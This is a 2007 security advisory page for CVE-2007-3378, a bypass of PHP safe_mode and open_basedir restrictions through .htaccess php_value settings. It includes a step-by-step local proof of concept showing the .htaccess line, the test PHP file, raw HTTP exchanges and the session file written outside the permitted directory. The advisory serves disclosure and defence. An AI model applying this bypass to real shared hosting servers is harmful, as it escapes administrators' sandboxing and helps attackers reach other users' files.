Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research
RSS

News

SecurityAlert

ExploitAlert

Apache

PHP
Corporate

Contact

About us
Services

SecurePHP
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Details : SecurityAlert

  Topic : PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass
  SecurityAlert : 2831
  CVE : CVE-2007-3378
  SecurityRisk : High  alert
  Remote Exploit : No
  Local Exploit : Yes
  Exploit Given : Yes
  Credit : Maksymilian Arciemowicz
  Date : 27.06.2007

  Affected Software :
PHP 5.2.3 and prior
PHP 4.4.7 and prior


  Advisory Text :  

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.3 PHP 4.4.7, htaccess safemode and open_basedir Bypass
Vulnerability ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason
Date:
- - Written: 10.02.2007
- - Public: 27.06.2007

SecurityReason Research
SecurityAlert Id: 45

CVE: CVE-2007-3378
SecurityRisk: High

Affected Software: PHP <= 5.2.3 , PHP <= 4.4.7
Advisory URL:
http://securityreason.com/achievement_securityalert/45
Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique
PHP-specific features thrown in. The goal of the language is to
allow web developers to write dynamically generated pages
quickly.

When using PHP as an Apache module, you can also change the
configuration settings using directives in Apache configuration
files (e.g. httpd.conf) and .htaccess files. You will need
"AllowOverride Options" or "AllowOverride
All" privileges to do so.


php_value name value

Sets the value of the specified directive. Can be used only
with PHP_INI_ALL and PHP_INI_PERDIR type directives. To clear a
previously set value use none as the value.

Note: Don't use php_value to set boolean values. php_flag
(see below) should be used instead.

php_flag name on|off

Used to set a boolean configuration directive. Can be used
only with PHP_INI_ALL and PHP_INI_PERDIR type directives.

mail.force_extra_parameters - Force the addition of the
specified parameters to be passed as extra parameters to the
sendmail binary. These parameters will always replace the value
of the 5th parameter to mail(), even in safe mode

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. htaccess safemode and open_basedir Bypass Vulnerability
---

When using PHP as an Apache module, you can also change the
configuration settings using directives in .htaccess file. These
options are used by a lot of users to change permissions options
like display_errors etc. But it is
possible to bypass a safe_mode or open_basedir in different
functions.For example you can set session.save_path via
.htaccess. In function session_save_path() and ini_set()
save_path is checked for safe_mode and open_basedir. In .htaccess
it is bypassed. Values from .htaccess are not checked.

For example:

cxib# ls -la /www/cxib/
total 14
drwxr-xr-x 3 cxib www 512 Feb 16 20:20 .
drwxr-xr-x 11 www www 7168 Feb 16 20:07 ..
- -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php
drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps
cxib# cat /www/cxib/stars.php
<?php
session_save_path("/inne");
session_start();
?>
cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:22:58 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1
DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Content-Length: 732
Content-Type: text/html

<br />
<b>Warning</b>: session_save_path() [<a
href='function.session-save-path'>function.session-save-path&l
t;/a>]:
open_basedir restriction in effect. File(/inne) is not within the
allowed
path(s): (/www) in <b>/www/cxib/stars.php</b> on line
<b>2</b><br />
<br />
<b>Warning</b>: session_start() [<a
href='function.session-start'>function.session-start</a>
]: open_basedir
restriction in effect. File(/var/tmp/) is not within the allowed
path(s):
(/www) in <b>/www/cxib/stars.php</b> on line
<b>3</b><br />
<br />
<b>Fatal error</b>: session_start() [&lt;a
href='function.session-start'&gt;function.session-start&l
t;/a&gt;]: Failed to
initialize storage module: files (path: ) in
<b>/www/cxib/stars.php</b> on
line <b>3</b><br />

Connection closed by foreign host.
cxib#

So we can't create session in directory. But when we create file
.htaccess, we can
write there:

- ---
php_value session.save_path /inne
- ---

cxib# ls -la /www/cxib/
total 16
drwxr-xr-x 3 cxib www 512 Feb 16 20:26 .
drwxr-xr-x 11 www www 7168 Feb 16 20:26 ..
- -rw-r--r-- 1 cxib www 34 Feb 16 20:26 .htaccess
- -rw-r--r-- 1 cxib www 53 Feb 16 20:19 stars.php
drwxr-xr-x 2 cxib www 512 Feb 16 20:18 temps
cxib# cat /www/cxib/.htaccess
php_value session.save_path /inne
cxib# cat /www/cxib/stars.php
<?php
session_start();
?>

We can't set session.save_path via ini_set() or
session_save_path().
Let's try sending a request.

cxib# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
GET /cxib/stars.php HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 16 Feb 2007 19:30:42 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1
DAV/2 PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: PHPSESSID=45cae9284f2f8b7cb05ce96021c9bf4e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Length: 0
Content-Type: text/html

Connection closed by foreign host.
cxib#
cxib# ls -la /inne
total 3
drwxrwxrwx 2 root wheel 512 Feb 16 20:30 .
drwxr-xr-x 24 root wheel 1024 Feb 16 20:05 ..
- -rw------- 1 www wheel 0 Feb 16 20:30
sess_45cae9284f2f8b7cb05ce96021c9bf4e

Open_basedir and safe_mode are bypassed.
Same problem is in error_log and probably in other functions.

This issue allows attacker to bypass disabled_functions like
system, exec etc. We have contacted with Stefan Esser to verify
this issue, big thanks for him. In PHP 5.2.3 it is possible to
execute command using exploit if mail() function is allowed.

- --- 2. Exploit ---

!WARNING!
This exploit will be public on 29.06.2007

Tested on: PHP 5.2.3 FreeBSD 6.2.
PHP 5.2.3 OpenBSD 4.1

Only for PHP5:
http://securityreason.com/achievement_exploitalert/9

- --- 3. How to fix ---

This bug has been founded on February 2007
We are still awaiting for reply from PHP Team.

- --- 4. Greets ---

For: sp3x, Infospec p_e_a, l5x, pi3 and Stefan Esser

- --- 5. Contact ---

Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (FreeBSD)

iD8DBQFGlsRe3Ke13X/fTO4RAqCPAJ9PGzk1l53YdU7oQ2daSqV7umS4FwCfZLqg
0gL56QwGpildJBh98c6KzcQ=
=6q2T
-----END PGP SIGNATURE-----
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.
Apache rss

» Apache-SSL memory
   disclosure

» Apache mod_negotiation
   Xss and Http Response
   Splitting

» Apache (mod_status)
   Refresh Header - Open
   Redirector (XSS)

» Apache (mod_proxy_ftp)
   Undefined Charset UTF-7
   XSS Vulnerability
PHP rss

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

» PHP 5.2.4
   mail.force_extra_paramete
   rs unsecure

» PHP <= 5.2.5
   stream_wrapper_register()
   Denial of service
Copyright © SecurityReason. All Rights Reserved.